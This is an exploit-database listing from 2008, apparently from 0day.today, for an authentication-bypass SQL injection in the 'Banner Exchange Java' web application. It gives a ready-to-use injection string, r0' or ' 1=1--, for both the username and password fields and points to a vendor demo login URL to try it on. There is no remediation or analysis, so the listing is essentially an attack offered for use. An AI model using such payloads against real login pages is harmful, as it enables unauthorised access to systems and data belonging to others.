Banner Exchange Java (Auth Bypass) SQL Injection Vulnerability

2008-12-11T00:00:00
ID 1337DAY-ID-4420
Type zdt
Reporter R3d-D3v!L
Modified 2008-12-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
Banner Exchange Java (Auth Bypass) SQL Injection Vulnerability
==============================================================


 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor: www.adserversolutions.com
   
 [~]Software: Banner Exchange Java 
   
 [~] Date: 28.11.2008
   
 [~] contact: N/A
   
 [~] Exploit:
   
 [~] username: r0' or ' 1=1--
 [~] password: r0' or ' 1=1--
   
   
 [?]login 4 d3m0:
   
  www.adservingsolutions.com/xchange_java/logon_license.jsp
 
 [~]--------------------------------------------------------------------------------



#  0day.today [2018-03-02]  #